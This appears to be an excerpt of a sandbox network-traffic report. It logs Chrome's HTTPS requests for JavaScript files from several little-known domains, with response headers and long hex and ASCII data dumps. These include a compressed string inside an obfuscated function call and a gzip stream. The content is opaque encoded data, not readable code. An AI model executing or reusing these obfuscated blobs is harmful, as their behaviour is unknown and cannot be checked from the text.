                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 47 42 48 32 45 78 56 46 39 68 31 6b 7a 2f 59 4f 62 59 46 57 70 6a 6f 41 44 68 6d 70 62 42 69 73 33 75 35 53 46 2f 4a 47 6a 68 4e 2b 37 2b 51 4d 79 45 38 72 36 2b 32 48 61 79 52 6e 69 73 75 70 56 65 78 75 69 34 2b 4c 77 67 55 6a 41 72 6d 67 6c 41 6d 6d 78 53 57 41 78 42 37 54 68 2f 4b 4a 48 59 68 4a 52 30 41 49 57 63 4c 67 69 37 78 41 54 53 49 2b 7a 6c 41 4c 58 6f 5a 49 45 75 77 4e 79 45 6b 6b 79 38 5a 4f 53 42 50 4c 53 53 54 49 38 30 58 76 68 77 47 43 46 61 35 35 68 58 32 45 2f 41 6e 34 41 71 70 43 42 59 53 4c 37 6b 6f 42 67 51 4f 54 43 36 59 4b 63 75 67 76 42 78 41 45 78 30 4a 63 45 68 6e 4f 51 41 5a 6f 49 73 62 6a 47 73 63 68 4c 41 34 65 34 49 64 47 45 56 73 4d 72 68 30 76 49 44 76 74 56 77 73 54 43 70 49 62 65 41 68 78 61 36 47 74 50 41 72 37 51 62 4a
                                                                                                                                                          Data Ascii: GBH2ExVF9h1kz/YObYFWpjoADhmpbBis3u5SF/JGjhN+7+QMyE8r6+2HayRnisupVexui4+LwgUjArmglAmmxSWAxB7Th/KJHYhJR0AIWcLgi7xATSI+zlALXoZIEuwNyEkky8ZOSBPLSSTI80XvhwGCFa55hX2E/An4AqpCBYSL7koBgQOTC6YKcugvBxAEx0JcEhnOQAZoIsbjGschLA4e4IdGEVsMrh0vIDvtVwsTCpIbeAhxa6GtPAr7QbJ
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 42 67 2b 66 61 5a 48 4a 5a 68 4b 59 59 41 71 6d 42 48 38 41 43 5a 30 50 6c 6a 5a 71 61 52 39 58 6d 57 65 61 69 41 79 35 6c 31 4d 50 4e 35 33 51 6a 64 67 71 6e 75 44 6a 34 56 4a 48 6f 41 71 33 6e 4d 41 4f 74 35 72 4b 43 62 65 51 31 35 32 33 6d 51 67 45 45 41 75 33 6b 6e 4f 4b 64 35 68 33 6b 56 75 62 52 47 33 7a 6e 6e 65 62 45 77 4d 68 6b 55 4c 74 64 35 52 6e 67 6d 32 43 39 35 7a 4b 6c 65 31 4c 64 35 57 72 6b 50 65 57 4e 35 39 37 4b 72 35 4f 70 77 47 66 6a 54 6d 64 6a 51 50 37 6e 5a 79 53 4e 35 62 33 6b 34 2b 5a 6d 67 43 47 67 59 2b 59 44 77 35 6e 6d 4d 65 51 31 35 75 50 6c 76 6f 41 54 77 73 62 6d 79 2b 65 6a 71 63 53 37 53 75 52 6f 67 30 76 6b 4b 41 44 44 35 38 76 6d 39 68 49 72 35 64 30 70 6b 34 43 72 35 44 58 6b 77 2b 66 4a 59 6d 76 6b 36 53 53 4b 45 38
                                                                                                                                                          Data Ascii: Bg+faZHJZhKYYAqmBH8ACZ0PljZqaR9XmWeaiAy5l1MPN53QjdgqnuDj4VJHoAq3nMAOt5rKCbeQ1523mQgEEAu3knOKd5h3kVubRG3znnebEwMhkULtd5Rngm2C95zKle1Ld5WrkPeWN597Kr5OpwGfjTmdjQP7nZySN5b3k4+ZmgCGgY+YDw5nmMeQ15uPlvoATwsbmy+ejqcS7SuRog0vkKADD58vm9hIr5d0pk4Cr5DXkw+fJYmvk6SSKE8
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 69 49 72 4e 74 67 5a 57 34 62 4f 4d 7a 51 6e 4e 41 4a 6c 4f 42 67 69 7a 67 5a 77 41 49 63 69 7a 67 65 36 73 56 38 59 6e 49 2f 67 42 73 5a 6e 4d 71 49 38 44 6a 75 4f 69 44 64 43 4e 6a 74 56 57 30 34 37 67 38 6c 6b 63 6f 70 62 66 31 78 69 4f 30 36 65 44 79 67 4b 42 43 76 5a 49 42 41 47 72 67 32 34 49 54 74 35 50 42 34 37 5a 31 35 36 4f 32 77 34 6d 4a 79 78 77 48 33 4f 4b 37 75 78 76 7a 6e 31 48 51 57 58 51 69 51 34 41 39 74 49 53 33 79 36 41 39 74 4a 59 42 4a 39 48 6f 73 45 53 44 7a 4f 42 45 67 5a 4e 43 77 55 4f 6e 6f 6a 59 46 49 6a 46 33 5a 4b 57 71 34 37 57 64 77 64 36 72 45 2b 4f 44 74 4b 77 7a 48 61 6e 30 6b 47 75 36 44 4e 6a 46 35 5a 4e 53 35 6b 47 74 67 44 6b 43 4b 6c 70 55 2b 5a 78 42 43 4a 4a 57 6b 45 4f 54 6b 7a 4a 52 68 48 47 32 6f 67 4b 44 2b 78
                                                                                                                                                          Data Ascii: iIrNtgZW4bOMzQnNAJlOBgizgZwAIcizge6sV8YnI/gBsZnMqI8DjuOiDdCNjtVW047g8lkcopbf1xiO06eDygKBCvZIBAGrg24ITt5PB47Z156O2w4mJyxwH3OK7uxvzn1HQWXQiQ4A9tIS3y6A9tJYBJ9HosESDzOBEgZNCwUOnojYFIjF3ZKWq47Wdwd6rE+ODtKwzHan0kGu6DNjF5ZNS5kGtgDkCKlpU+ZxBCJJWkEOTkzJRhHG2ogKD+x
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 32 66 34 58 58 34 39 42 67 6c 67 42 46 6c 64 36 5a 6c 46 75 71 6b 59 57 6f 75 77 42 66 75 35 34 42 33 70 76 4b 67 56 7a 33 61 46 73 63 51 50 70 43 4b 63 4b 68 2b 37 33 62 51 38 77 4c 4e 61 57 37 74 31 42 32 55 54 69 68 37 38 42 6c 47 46 79 44 77 41 48 36 44 50 43 7a 31 43 44 74 7a 48 75 50 69 65 4c 31 41 35 54 50 65 38 48 41 39 68 5a 50 70 6b 7a 56 41 52 4f 4e 36 32 48 52 4a 30 54 42 66 41 35 65 2b 37 2f 44 4b 43 4e 37 42 2f 6b 44 71 43 49 68 4e 6b 32 31 36 43 47 55 63 68 67 69 67 44 58 77 4e 67 51 68 57 43 46 42 6a 39 67 6a 55 38 49 34 49 7a 67 69 75 43 4a 49 38 37 67 6a 68 66 73 39 55 50 67 67 53 38 35 2f 31 46 67 69 2b 54 43 45 49 52 51 6a 68 43 4d 49 4e 70 67 41 78 43 48 45 49 75 67 69 4a 43 48 73 4d 4b 51 69 78 41 51 6b 49 39 54 6f 35 43 49 62 47 4f
                                                                                                                                                          Data Ascii: 2f4XX49BglgBFld6ZlFuqkYWouwBfu54B3pvKgVz3aFscQPpCKcKh+73bQ8wLNaW7t1B2UTih78BlGFyDwAH6DPCz1CDtzHuPieL1A5TPe8HA9hZPpkzVARON62HRJ0TBfA5e+7/DKCN7B/kDqCIhNk216CGUchgigDXwNgQhWCFBj9gjU8I4IzgiuCJI87gjhfs9UPggS85/1Fgi+TCEIRQjhCMINpgAxCHEIugiJCHsMKQixAQkI9To5CIbGO
                                                                                                                                                          2024-06-09 22:40:58 UTC4513INData Raw: 7a 75 31 4a 44 6e 66 64 54 78 71 6c 79 31 75 68 6b 68 6b 32 50 55 37 6d 41 54 31 44 77 64 48 36 78 42 31 41 49 30 52 33 4e 57 77 77 76 55 55 4d 4f 61 36 66 48 62 43 4f 76 73 63 33 65 55 32 39 53 6d 31 46 66 78 34 54 41 48 31 4d 7a 55 78 65 34 68 52 32 66 55 75 4d 56 58 31 47 70 39 34 46 52 79 63 30 55 74 54 39 53 55 4e 4b 2f 55 37 39 54 55 4e 46 2f 55 6c 41 43 2f 31 47 45 41 2f 39 51 45 65 77 73 41 6d 74 53 67 4e 46 73 49 56 65 75 51 4e 50 7a 6e 37 61 69 4d 61 31 6d 41 38 44 54 4d 35 30 67 30 44 47 53 6f 4e 4a 4e 4e 57 44 53 71 4e 48 67 30 58 52 69 57 71 49 51 30 63 31 52 6b 76 57 4b 31 4b 31 51 55 4e 43 2f 55 6b 75 64 48 30 4b 47 62 39 44 52 6f 4e 49 75 73 7a 44 52 46 32 31 79 59 66 2b 69 37 52 62 66 55 76 44 54 72 5a 2b 6a 6b 47 75 64 73 35 7a 75 34 6f
                                                                                                                                                          Data Ascii: zu1JDnfdTxqly1uhkhk2PU7mAT1DwdH6xB1AI0R3NWwwvUUMOa6fHbCOvsc3eU29Sm1Ffx4TAH1MzUxe4hR2fUuMVX1Gp94FRyc0UtT9SUNK/U79TUNF/UlAC/1GEA/9QEewsAmtSgNFsIVeuQNPzn7aiMa1mA8DTM50g0DGSoNJNNWDSqNHg0XRiWqIQ0c1RkvWK1K1QUNC/UkudH0KGb9DRoNIuszDRF21yYf+i7RbfUvDTrZ+jkGuds5zu4o


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          183192.168.2.54992890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC540OUTGET /pc/240516-03/static/js/common.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC646INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:57 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 127284
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:56:42 GMT
                                                                                                                                                          ETag: "6645ca4a-1f134"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[5],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE14[569],EU-GER-frankfurt-GLOBAL1-CACHE7[377,TCP_MISS,563],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: acc626fda7b23b9de0f2aadb981fa4b4
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1993392
                                                                                                                                                          X-CCDN-Expires: 598608
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC15738INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 4a 67 47 5a 63 42 64 41 47 67 47 38 41 69 41 42 67 41 34 42 7a 41 5a 53 6f 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 4a 6c 35 6b 51 5a 4e 41 45 70 71 6e 4a 43 41 41 45 53 58 67 43 64 2b 66 4b 67 47 34 51 41 4f 69 67 42 65 43 69 42 34 6f 41 4a 69 41 37 63 2b 67 74 4d 4b 6d 39 64 58 48 67 4b 47 38 70 41 4e 79 68 4b 35 59 74 47 53 56 6c 2b 36 75 77 6f 53 70 67 67 75 6c 52 55 76 72 71 38 57 67 41 32 68 67 79 38 41 42 62 69 75 6a 54 71 61 41 41 38 53 68 6b 41 31 4c 6b 53 6d 50 7a 52 57 6a 42 4a 48 67 44 43 4a 69 41 41 67 72 79 59 6b 68 49 41 66 4c 71 34 41 47 52 74 2f 4a 6d 74 2b 41 44 73 41 50 77 67 75 53 56 6c 48 6e 55 4e 45 71 7a 38 54 66
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAJgGZcBdAGgG8AiABgA4BzAZSoC4AzAVzRgBcBLdJl5kQZNAEpqnJCAAESXgCd+fKgG4QAOigBeCiB4oAJiA7c+gtMKm9dXHgKG8pANyhK5YtGSVl+6uwoSpggulRUvrq8WgA2hgy8ABbiujTqaAA8ShkA1LkSmPzRWjBJHgDCJiAAgryYkhIAfLq4AGRt/Jmt+ADsAPwguSVlHnUNEqz8Tf
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 71 59 65 71 63 52 41 66 46 52 30 45 51 39 59 43 32 35 4a 67 58 4f 58 54 35 46 64 77 63 56 57 43 48 44 39 6b 72 32 49 46 64 48 5a 66 59 55 67 46 50 68 56 51 34 44 76 70 66 4d 76 72 41 62 4c 35 68 54 79 2b 73 32 67 48 51 4d 63 68 38 56 39 74 46 6c 65 71 62 4f 41 2b 30 6e 59 48 59 57 6d 6b 46 4d 79 44 73 50 46 55 74 36 33 33 73 79 45 51 37 77 6a 73 52 78 4d 47 4c 65 41 68 38 4b 6f 50 46 65 4c 57 38 7a 75 79 32 38 32 64 42 52 74 38 43 77 56 79 47 45 70 41 4b 6e 4f 6d 31 65 4e 4e 37 69 33 36 6b 51 76 48 51 39 44 74 66 34 4d 68 6d 69 4b 4f 39 70 41 59 78 66 52 4c 30 77 4d 65 4f 33 65 67 59 79 77 6f 68 76 59 67 63 47 44 45 46 44 6d 37 74 47 35 4d 4d 4b 38 46 7a 6b 34 58 47 66 50 30 68 52 4f 51 51 71 59 66 67 37 36 50 32 76 62 4b 72 4c 45 48 59 44 71 41 59 41 31
                                                                                                                                                          Data Ascii: qYeqcRAfFR0EQ9YC25JgXOXT5FdwcVWCHD9kr2IFdHZfYUgFPhVQ4DvpfMvrAbL5hTy+s2gHQMch8V9tFleqbOA+0nYHYWmkFMyDsPFUt633syEQ7wjsRxMGLeAh8KoPFeLW8zuy282dBRt8CwVyGEpAKnOm1eNN7i36kQvHQ9Dtf4MhmiKO9pAYxfRL0wMeO3egYywohvYgcGDEFDm7tG5MMK8Fzk4XGfP0hROQQqYfg76P2vbKrLEHYDqAYA1
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 67 78 54 77 58 65 6c 4f 65 31 53 69 4b 45 46 35 43 50 38 2b 57 78 50 41 42 30 67 68 55 4a 41 51 45 64 34 42 58 53 55 38 6c 64 4a 6d 46 61 58 63 56 32 31 54 6a 4e 6a 71 62 2f 33 63 52 42 46 32 2f 52 39 4b 31 74 48 2f 6f 43 61 4c 6b 49 4d 56 63 55 39 78 67 4d 32 44 4c 45 4d 52 4d 32 75 55 44 4b 61 42 38 4c 6c 6f 62 33 7a 65 79 51 53 4e 51 78 76 41 77 6c 36 58 4b 69 44 77 56 48 57 66 4f 63 2b 43 4a 33 58 70 71 6e 61 6d 46 2b 6c 72 6c 72 71 49 50 34 64 65 45 6e 59 51 6f 65 46 56 59 41 55 6f 4c 52 6f 53 68 6a 49 51 38 78 6b 41 48 61 61 38 78 48 52 4c 49 57 53 46 35 41 70 75 4c 43 6c 4e 35 67 67 64 69 51 56 70 41 43 2f 73 36 33 4f 74 41 49 61 47 4e 35 2f 30 59 7a 74 30 33 74 55 4f 46 75 65 6d 73 4b 62 6b 4b 4b 51 50 54 38 4b 6a 79 52 75 6f 62 72 65 61 79 4d 6f
                                                                                                                                                          Data Ascii: gxTwXelOe1SiKEF5CP8+WxPAB0ghUJAQEd4BXSU8ldJmFaXcV21TjNjqb/3cRBF2/R9K1tH/oCaLkIMVcU9xgM2DLEMRM2uUDKaB8Llob3zeyQSNQxvAwl6XKiDwVHWfOc+CJ3XpqnamF+lrlrqIP4deEnYQoeFVYAUoLRoShjIQ8xkAHaa8xHRLIWSF5ApuLClN5ggdiQVpAC/s63OtAIaGN5/0Yzt03tUOFuemsKbkKKQPT8KjyRuobreayMo
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 56 79 7a 4f 5a 52 76 4c 39 5a 66 67 71 72 4a 63 59 41 45 46 54 2f 4b 74 41 4c 36 42 5a 70 63 43 4c 47 6b 6e 5a 4b 58 4a 5a 44 4b 64 37 50 2f 4b 66 4a 5a 35 4c 51 4b 45 6e 4b 66 41 4b 41 72 35 35 55 7a 4b 41 4a 41 46 4c 6c 35 66 33 4c 6a 75 53 51 71 68 35 51 70 6a 39 5a 53 46 4c 41 70 51 77 42 71 46 5a 50 4c 6a 70 53 6b 41 65 46 53 74 79 2b 46 65 53 4c 52 67 49 53 4b 68 46 57 76 4c 53 46 57 49 71 41 6e 6c 46 4c 43 52 64 49 71 6a 70 65 65 79 54 51 4e 33 4c 56 5a 65 41 71 2b 46 58 53 4b 45 50 43 6c 4c 51 49 4d 51 72 64 5a 57 51 72 52 73 58 46 4b 7a 46 54 6f 71 68 5a 65 65 79 37 51 4c 4e 4c 38 70 53 41 42 53 70 51 2f 4b 6b 35 61 36 42 36 46 51 4b 4a 53 70 64 4b 79 75 66 48 6f 51 79 45 65 4d 38 6e 4a 4e 38 42 35 38 4f 4d 39 42 75 44 6f 42 51 69 55 55 44 48 6a
                                                                                                                                                          Data Ascii: VyzOZRvL9ZfgqrJcYAEFT/KtAL6BZpcCLGknZKXJZDKd7P/KfJZ5LQKEnKfAKAr55UzKAJAFLl5f3LjuSQqh5Qpj9ZSFLApQwBqFZPLjpSkAeFSty+FeSLRgISKhFWvLSFWIqAnlFLCRdIqjpeeyTQN3LVZeAq+FXSKEPClLQIMQrdZWQrRsXFKzFToqhZeey7QLNL8pSABSpQ/Kk5a6B6FQKJSpdKyufHoQyEeM8nJN8B58OM9BuDoBQiUUDHj
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 7a 71 4e 70 79 41 41 59 37 6c 41 41 47 41 75 67 41 44 46 56 51 41 42 6f 52 68 30 34 34 36 38 53 32 49 6d 79 59 7a 7a 57 62 52 70 31 67 50 4c 35 62 55 43 7a 79 37 77 30 72 59 4f 58 64 4f 48 2f 64 65 6e 62 64 66 63 6d 67 46 77 78 76 30 6d 57 77 35 47 57 57 37 47 57 46 4b 32 6a 47 5a 6c 54 37 71 2b 70 54 48 37 74 73 39 6c 56 30 2f 52 36 33 6e 57 54 71 6a 49 59 39 76 74 51 69 4d 59 39 43 38 42 57 35 67 48 6c 65 41 77 36 33 6d 33 71 4f 51 71 6e 30 67 4f 39 6d 59 57 36 75 58 49 32 35 32 6e 38 4f 57 65 33 31 30 50 70 4a 6b 32 39 70 42 44 72 76 54 41 64 67 4e 4d 48 79 34 48 58 58 59 43 41 50 68 51 4f 37 41 5a 50 30 42 68 41 48 66 41 66 49 37 38 44 79 5a 59 4c 75 4b 63 4c 49 4f 7a 4e 6b 48 4e 5a 45 33 53 47 33 74 32 4c 4b 38 4a 79 39 44 35 77 76 59 68 37 59 4a 74
                                                                                                                                                          Data Ascii: zqNpyAAY7lAAGAugADFVQABoRh04468S2ImyYzzWbRp1gPL5bUCzy7w0rYOXdOH/denbdfcmgFwxv0mWw5GWW7GWFK2jGZlT7q+pTH7ts9lV0/R63nWTqjIY9vtQiMY9C8BW5gHleAw63m3qOQqn0gO9mYW6uXI252n8OWe310PpJk29pBDrvTAdgNMHy4HXXYCAPhQO7AZP0BhAHfAfI78DyZYLuKcLIOzNkHNZE3SG3t2LK8Jy9D5wvYh7YJt
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 36 57 47 62 64 6f 6c 47 5a 47 47 61 51 4b 6b 30 37 57 48 42 66 67 38 68 4b 35 44 4d 50 6f 78 68 43 57 46 55 69 6f 43 49 69 64 79 47 4b 6b 5a 68 4d 2f 49 38 6d 4f 38 63 49 70 6a 76 48 46 4b 59 55 51 70 41 31 69 30 79 35 41 41 34 2b 50 63 4b 38 43 47 5a 41 4b 4a 68 61 61 48 49 49 56 49 41 54 32 48 33 59 62 78 68 64 32 47 73 50 4b 30 41 6b 30 69 43 37 4f 79 68 77 2b 43 45 49 5a 35 68 4f 6d 48 41 59 53 49 63 4f 30 37 45 6f 52 52 32 68 52 43 62 4c 74 56 4f 4a 41 44 6b 41 47 5a 68 36 4f 47 4a 78 50 43 36 71 61 5a 63 2b 4f 79 68 77 42 77 77 34 58 77 6f 5a 6d 46 77 34 55 70 41 6e 32 48 50 77 45 68 47 6a 67 4c 6c 77 49 66 41 4f 65 5a 30 67 56 6a 68 65 69 69 50 5a 75 51 57 69 4a 68 63 2b 4a 4f 68 59 43 71 74 45 4f 33 73 58 52 43 32 6b 44 39 68 59 2f 62 73 41 4f 4f
                                                                                                                                                          Data Ascii: 6WGbdolGZGGaQKk07WHBfg8hK5DMPoxhCWFUioCIidyGKkZhM/I8mO8cIpjvHFKYUQpA1i0y5AA4+PcK8CGZAKJhaaHIIVIAT2H3Ybxhd2GsPK0Ak0iC7Oyhw+CEIZ5hOmHAYSIcO07EoRR2hRCbLtVOJADkAGZh6OGJxPC6qaZc+OyhwBww4XwoZmFw4UpAn2HPwEhGjgLlwIfAOeZ0gVjheiiPZuQWiJhc+JOhYCqtEO3sXRC2kD9hY/bsAOO
                                                                                                                                                          2024-06-09 22:40:58 UTC16384INData Raw: 72 58 6c 4c 65 51 72 51 57 2f 47 4f 2b 4b 65 63 76 58 6c 6e 41 4b 4e 35 6a 66 46 47 6f 45 64 35 49 33 6b 7a 65 51 37 78 34 63 67 58 65 61 71 5a 56 33 6c 6e 41 4e 46 77 52 33 6e 69 41 4b 75 52 63 79 72 63 33 74 4a 49 37 33 6d 72 65 64 56 35 61 4f 47 2b 41 47 30 45 72 46 7a 6d 5a 74 41 52 52 47 49 31 67 42 7a 51 68 48 7a 42 38 49 4d 51 53 38 34 46 51 50 74 41 32 78 54 4e 51 49 4f 55 4b 53 67 32 73 4a 4e 41 4b 55 44 57 6c 4b 4a 53 6f 6d 43 69 6a 6f 50 57 62 31 6d 70 57 61 43 4b 6f 64 6e 47 42 4b 33 34 6a 34 4b 4e 37 6d 4f 2b 30 63 77 4c 64 42 70 55 6d 38 41 51 76 42 6a 35 76 41 44 37 34 68 70 55 30 37 45 4f 33 4d 78 5a 36 49 4a 45 2b 63 45 41 4a 50 6e 36 67 68 70 55 44 4d 5a 6c 61 62 41 6f 4c 62 6c 64 69 66 36 5a 6a 61 43 34 2b 62 56 67 4f 6b 41 38 71 4f 75
                                                                                                                                                          Data Ascii: rXlLeQrQW/GO+KecvXlnAKN5jfFGoEd5I3kzeQ7x4cgXeaqZV3lnANFwR3niAKuRcyrc3tJI73mredV5aOG+AG0ErFzmZtARRGI1gBzQhHzB8IMQS84FQPtA2xTNQIOUKSg2sJNAKUDWlKJSomCijoPWb1mpWaCKodnGBK34j4KN7mO+0cwLdBpUm8AQvBj5vAD74hpU07EO3MxZ6IJE+cEAJPn6ghpUDMZlabAoLbldif6ZjaC4+bVgOkA8qOu
                                                                                                                                                          2024-06-09 22:40:58 UTC13242INData Raw: 43 30 69 44 72 6a 74 74 43 32 30 4d 62 51 2f 45 7a 4b 33 56 42 49 35 74 34 30 44 71 62 56 31 74 47 36 31 78 7a 63 4a 74 44 6d 32 74 62 52 32 74 51 32 33 52 32 4e 71 41 37 6d 33 62 72 64 65 6b 58 6d 33 6e 51 50 64 74 6c 64 68 74 72 63 39 74 55 30 44 46 62 55 6c 41 37 32 30 78 6e 4f 73 74 68 57 33 55 62 59 35 74 75 6e 6f 49 72 61 6a 38 41 6d 33 41 72 54 33 56 64 56 6a 4d 72 66 6c 35 77 71 30 70 51 4b 44 74 6e 31 67 75 62 51 31 74 57 36 42 74 31 58 33 56 30 4f 33 63 62 57 74 74 6e 68 6c 6e 62 62 46 74 59 4f 32 49 37 51 78 74 52 4b 31 32 62 54 64 74 55 57 30 43 6b 4a 4f 74 59 4f 30 4d 62 59 79 74 76 36 32 73 72 5a 5a 74 75 61 33 77 37 5a 7a 59 44 47 31 38 72 64 44 74 66 57 30 59 37 59 71 55 4a 4f 32 66 57 41 78 74 55 44 57 5a 62 59 39 41 4d 6d 30 4c 41 50 70
                                                                                                                                                          Data Ascii: C0iDrjttC20MbQ/EzK3VBI5t40DqbV1tG61xzcJtDm2tbR2tQ23R2NqA7m3brdekXm3nQPdtldhtrc9tU0DFbUlA720xnOsthW3UbY5tunoIraj8Am3ArT3VdVjMrfl5wq0pQKDtn1gubQ1tW6Bt1X3V0O3cbWttnhlnbbFtYO2I7QxtRK12bTdtUW0CkJOtYO0MbYytv62srZZtua3w7ZzYDG18rdDtfW0Y7YqUJO2fWAxtUDWZbY9AMm0LAPp


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          184192.168.2.549924183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:57 UTC556OUTGET /ftl/commonPage/js/jquery/jquery-1.11.3.min.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:58 UTC711INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 33545
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-HUZ-MP-04-01
                                                                                                                                                          ETag: W/"5d848f4f-176d4"
                                                                                                                                                          Date: Sat, 08 Jun 2024 01:32:39 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Mon, 08 Jul 2024 01:32:39 GMT
                                                                                                                                                          Age: 162498
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;huzmp04:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-04-01
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-10
                                                                                                                                                          X-Cdn-Request-ID: d4f6183814cbdee1f542df356dff5e8f
                                                                                                                                                          2024-06-09 22:40:58 UTC15673INData Raw: 1f 8b 08 00 00 00 00 00 00 03 dc bd 79 7b e3 c6 b1 2e fe ff f9 14 22 e2 43 03 c3 16 25 8e ed dc 13 70 20 3e b6 c7 8e ed 78 4b 66 1c 3b a1 68 3f d8 48 42 e2 26 92 1a 8d 2c 32 9f fd d6 5b d5 dd 68 2c 1c 3b e7 dc df f2 5c 27 23 62 69 f4 5a 5d 5b d7 72 f1 ac 73 76 f3 d7 fb 7c fb 78 f6 66 d0 1f 0c fa 1f 9c 1d ce fc 34 38 7b 7e 79 f9 91 a2 bf 83 8f cc fb cf d7 f7 ab 2c de 17 eb 95 3a fb 72 95 f6 a9 e0 cd 1d de f4 d7 db d9 c5 a2 48 f3 d5 2e 3f 7b 76 f1 1f 9d e9 fd 2a 45 39 3f 56 49 f0 e4 ad 93 9b 3c dd 7b 51 b4 7f dc e4 eb e9 d9 72 9d dd 2f f2 6e f7 c4 8b 7e fe 76 b3 de ee 77 a3 ea 6d 14 f7 b3 75 7a bf cc 57 fb 51 42 35 77 2e 83 b0 6c 28 78 2a a6 7e a7 2c 12 ec e7 db f5 c3 d9 2a 7f 38 fb 6c bb 5d 6f 7d 4f 8f 62 9b df dd 17 db 7c 77 16 9f 3d 14 ab 8c ca 3c 14 fb
                                                                                                                                                          Data Ascii: y{."C%p >xKf;h?HB&,2[h,;\'#biZ][rsv|xf48{~y,:rH.?{v*E9?VI<{Qr/n~vwmuzWQB5w.l(x*~,*8l]o}Ob|w=<
